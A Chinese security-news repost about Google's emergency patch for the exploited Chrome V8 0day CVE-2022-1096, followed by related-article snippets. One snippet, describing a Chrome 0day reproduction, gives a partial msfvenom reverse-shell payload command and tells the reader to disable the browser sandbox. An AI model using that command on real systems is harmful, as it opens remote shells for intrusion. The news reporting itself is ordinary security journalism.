谷歌紧急修复已遭利用的新 0day

最新推荐文章于 2022-09-05 19:24:36 发布
最新推荐文章于 2022-09-05 19:24:36 发布
阅读量229 收藏
点赞数
文章标签: java 安全 xss 大数据 安全漏洞
原文链接:https://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247511119&idx=1&sn=7f3598d889c539021bc66b3485c91f1a&chksm=ea949d25dde31433edba17929d96a8b7bfa781a5afea6a018db5e1ff504848296ae41161fe71&scene=126&&sessionid=0
版权

ebbdac375afd0c7aca83b534ed0bce3c.gif 聚焦源代码安全,网罗国内外最新资讯!

编译:代码卫士

1151ec0c7d92f29c5ea2fc52950e8a71.png

上周五,谷歌紧急修复已遭利用的 Chrome 0day (CVE-2022-1096),和 V8 JavaScript 引擎中的类型混淆漏洞有关。一名匿名研究员在2022年3月23日将漏洞告知谷歌公司。

e99d5748fd4520736c2afbce7e5afd26.png

当使用与原始初始化不兼容的类型访问某种资源(如变量或对象)时会触发类型混淆错误,从而在内存不安全的语言如 C和C++ 中造成严重后果,使恶意人员执行界外内存访问。

MITRE CWE 解释称,“当使用错误的类型访问内存缓冲区时,它可读或写该缓冲区界外的内存,如果所分配缓冲区小于代码试图访问的类型,则可导致崩溃甚至代码执行。”

谷歌证实称“CVE-2022-1096的exploit 已在野存在”,但为了阻止进一步的利用,方便大部分用户更新,谷歌并未提供更多详情。

第二个0day

9d13cad22c2053545a4a42b00d6c3b68.png

CVE-2022-1096 是谷歌今年依赖修复的第二个 Chrome 0day,第一个是CVE-2022-0609,它是位于Animation 组件中的释放后使用漏洞,在2022年2月14日修复。

上周早些时候,谷歌 TAG 团队详述了朝鲜国家黑客组织发动的攻击活动,它们利用CVE-2022-0609 攻击位于美国的组织机构,遍布新闻媒体、IT、密币和金融技术行业。

强烈建议Chrome 用户更新至 Windows、Mac和Linux 的最新版本99.0.4844.84。建议使用基于 Chromium 浏览器如 Microsoft Edge、Opera 和 Vivaldi 的用户届时尽快应用修复方案。

代码卫士试用地址:https://codesafe.qianxin.com

开源卫士试用地址:https://oss.qianxin.com

推荐阅读

谷歌:早在这个0day 补丁发布前几周,朝鲜国家黑客就已利用

谷歌宣布 Linux Kernel、Kubernetes 0day 漏洞奖励加倍

谷歌Chrome 紧急修复已遭利用的0day

谷歌:修复0day漏洞的平均耗时比3年前减少28天

谷歌详述 Zoom 客户端和MMR 服务器中的两个0day

原文链接

https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html

题图:Pixabay License

本文由奇安信编译,不代表奇安信观点。转载请注明“转自奇安信代码卫士 https://codesafe.qianxin.com”。

f85e0c50edaacf18f992348e1021f2d9.png

686aca9c4544e96a7029ced1995e2730.png

奇安信代码卫士 (codesafe)

国内首个专注于软件开发安全的产品线。

   7bf0217ad857e9574e0429b0d5e7aee7.gif 觉得不错,就点个 “在看” 或 "赞” 吧~

奇安信代码卫士
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Dirty Pipe 漏洞(CVE-2022-0847)复现
safehao的博客
03-10 2205
Dirty Pipe 漏洞(CVE-2022-0847)复现 2022年3月7日Max Kellermann max.kellermann@ionos.com发布关于[The Dirty Pipe Vulnerablity](The Dirty Pipe Vulnerability — The Dirty Pipe Vulnerability documentation (cm4all.com))的文章。描述了关于该漏洞的发现过程以及POC。Dirty Pipe漏洞类似于Dirty Cow漏洞,该漏洞允许改
谷歌紧急修复今年已利用的第9个0day
smellycat000的专栏
12-05 686
聚焦源代码安全,网罗国内外最资讯!编译:代码卫士当地时间上周五,谷歌紧急修复利用的Chrome 高危0day (CVE-2022-4262)。该漏洞是位于V8 JavaScript引擎中的一个类型混淆漏洞,是由谷歌威胁分析团队 (TAG) 在2022年11月29日报告的。类型混淆漏洞可用于执行带外内存访问,从而导致崩溃和任意代码执行后果。美国国家漏洞库 (NVD) 指出,该漏洞导致“远程攻...
谷歌Chrome紧急修复利用0day
smellycat000的专栏
09-05 286
聚焦源代码安全,网罗国内外最资讯!编译:代码卫士谷歌发布适用于Windows、Mac和Linux 用户的Chrome 105.0.5195.102 版本,修复利用的高危漏洞 (CVE-2022-3075),它是今年以来谷歌修复的第六个已利用0day谷歌在上周五发布安全公告指出,“谷歌发现CVE-2022-3075的exploit已在野。”该版本在桌面稳定版频道推出,谷歌表示将在数天...
Chrome漏洞分析与利用(九)——issue 1296150(cve 2022-0609)
Anansi的博客
07-08 1630
issue 1296150(CVE 202-0609) 由于此漏洞在chromium release版本下触发失败,通过查看issue页面发现崩溃产生于DCHECK(),故尝试编译debug版进行漏洞调试 安装vs,勾选以下组件其余默认,vs最好安装在默认路径否则在编译时可能出现问题,具体问题及解决办法查看v8编译。 然后设置好环境变量 使用以下方法获取指定版本chromium的源码 再使用以下方法同步源码并同时执行runhooks 使用以下方法清理目录 最后执行以下内容打开编译配置文件 在编译配置
Chrome浏览器爆高严重性安全漏洞
极道Jdon的技术博客
03-28 558
Google 已针对 Chrome 99 发布了紧急安全,以解决已存在公开利用漏洞的漏洞。CVE-2022-1096并被认为是高严重性的安全漏洞。是V8 JavaScript 和 WebAssembly 引擎中的类型混淆错误。 该漏洞是由一位匿名研究人员报告的,该公司尚未确定此问题的漏洞赏金金额。 谷歌已经为所有 Chrome 用户发布了一个紧急安全,因为它确认攻击者已经在利用一个高严重性的零日漏洞。Chrome 99.0.4844.8...
Blitz团队挖到了一个0DAY漏洞
最新发布
07-26
0day漏洞复现
IE 0day漏洞Metasploit生成方法.txt
03-18
IE 0day漏洞Metasploit生成方法.txt
phpcms后台普通用户读文件0day的分析以及修复方法
09-29
### phpcms后台普通用户读文件0day的分析与修复 #### 一、知识点概述 在Web开发领域,特别是基于PHP构建的应用系统中,安全漏洞是开发者必须时刻警惕的问题之一。其中,“0day”(零日)漏洞尤其引人关注,这类...
Hacking Team flash 0day利用
07-14
Hacking Team Flash 0Day 利用代码分析
0day检测工具2023
06-27
在信息安全行业中,"0day"一词指的是那些刚刚被发现、尚未有官方补丁或解决方案的漏洞,攻击者利用这些未知漏洞进行攻击。0day检测工具的目的是帮助用户在这些威胁造成实际损害之前识别并防御它们。 0day攻击的危险...
CVE-2020-1938.py
01-23
CVE-2020-1938.py
Windows CVE-2022-21907漏洞复现
执着
01-20 1万+
测试环境:虚拟机Windows 10 Windows版本:cn_windows_10_consumer_editions_version_2004_updated_sep_2020_x64_dvd_049d70ee.iso 此次CVE的漏洞是由于HTTP.sys的缓冲区溢出从而导致的拒绝服务,蓝屏重启。 微软官方在第一时间修复此漏洞,据微软官方公布的此次漏洞影响范围: Windows Server 2019 (Server Core installation) Windows Server 201..
谷歌分析2022在野0day利用后,得出令人意外的结论
smellycat000的专栏
07-01 725
聚焦源代码安全,网罗国内外最资讯!编译:代码卫士2022年6月,谷歌零日项目团队 (Project Zero) 研究员 Maddle Stone在近期举办的 FIRST 会议上发表了报告《目前为止的2022年在野0day利用》分享了该团队的对2022年上半年0day利用情况的研究成果。如下是相关内容编译。截止到2022年6月15日,我们已经检测并披露了18个在野利用0...
linux-kali内核提权漏洞复现CVE-2022-0847)
tlovejr的博客
03-08 2250
linux-kali内核提权漏洞复现CVE-2022-0847) 漏洞介绍 这是 CVE-2022-0847 的故事,它是自 5.8 以来 Linux 内核中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 它类似于CVE-2016-5195 “Dirty Cow”,但更容易被利用。 该漏洞已 在 Linux 5.16.11、5.15.25 和 5.10.102 中修复。 漏洞影响版本 Linux kali 5.10.0-kali7-amd64 #1 S
谷歌浏览器Chrome最命令执行0day复现
Jietewang的博客
04-13 691
目录 1.简介 2.复现过程截图 1.简介 最护网周期内每个相关人员的弦都是紧绷的,今天偶然获得一个0day随即来复现一下子。也思考了一下该漏洞造成的危害和具体的利用方式,如有奇思妙想欢迎私聊。 2.复现过程截图 使用快捷方式获取到浏览器安装位置,关闭沙箱并运行浏览器。 执行上面的命令后出现的结果 进入下载好的html文件 执行exp 漏洞来源:https://github.com/r4j0x00/exploits/tree/master/chrome-0da...
谷歌发现利用零日漏洞的攻击、黑客通过漏洞入侵红十字会|2月17日全球网络安全热点
qcloud_security的博客
02-17 1166
安全资讯报告 加坡将加强网络钓鱼诈骗后的安全措施 加坡正在加强安全措施,以支持当地的银行和通信基础设施,其中包括短信服务提供商需要在发送消息之前检查注册表。预计银行还将开发“更通用”的人工智能(AI)模型来检测可疑交易。 额外的保护措施是在最近一连串短信网络钓鱼诈骗之后推出的,这些诈骗从790名华侨银行客户的账户中损失了1370万加坡元(1017万美元)。诈骗者操纵了SMS发件人ID详细信息,以推送看似来自华侨银行的消息,敦促受害者解决他们的银行账户问题。然后他们被重定向到网...
Google Chrome 0day 远程代码执行漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-18 682
1.环境win10、win7均可 2.关闭沙箱模式-no-sandbox 3.chrome客户端需64位(Google Chrome < = 89.0.4389.114) 使用命令关闭沙箱模式chrome.exe --no-sandbox Poc:https://github.com/r4j0x00/exploits/tree/master/chrome-0day msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.72.12
谷歌:早在这个0day 补丁发布前几周,朝鲜国家黑客就已利用
smellycat000的专栏
03-25 202
聚焦源代码安全,网罗国内外最资讯!编译:代码卫士谷歌威胁分析团队 (TAG) 指出,在谷歌 Chrome RCE 0day (CVE-2022-0609) 被修复的几周前,两个朝鲜国家黑客组织就利用它攻击闻媒体、IT企业、密币和金融科技组织机构。早在1月初就被活跃利用谷歌 TAG 团队发布报告详述了和该漏洞利用攻击活动相关的战术、技术和程序 (TTPs),该漏洞被用...
[漏洞分析] CVE-2022-25636 netfilter内核提权
热门推荐
Breeze的博客
03-20 1万+
CVE-2022-25636 netfilter内核提权 文章目录CVE-2022-25636 netfilter内核提权漏洞简介环境搭建漏洞原理漏洞发生点调用栈netfilter的使用以及触发漏洞利用泄露内核net_device结构体地址setxattr来UAF泄露kaslr二次UAF完成内核rop参考 漏洞简介 漏洞编号: CVE-2022-25636 漏洞产品: linux kernel - netfilter 影响版本: linux kernel 5.4 ~ 漏洞危害: netfilter 内核模块
软件漏洞分析技术:0day安全攻防实践指南
0day漏洞是指被攻击者掌握却未被软件厂商修复的系统漏洞。0day漏洞是攻击者入侵系统的终极武器,资深的黑客手里总会掌握几个功能强大的0day漏洞。0day漏洞是木马、病毒、间谍软件入侵系统的最有效途径。 **漏洞分析...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值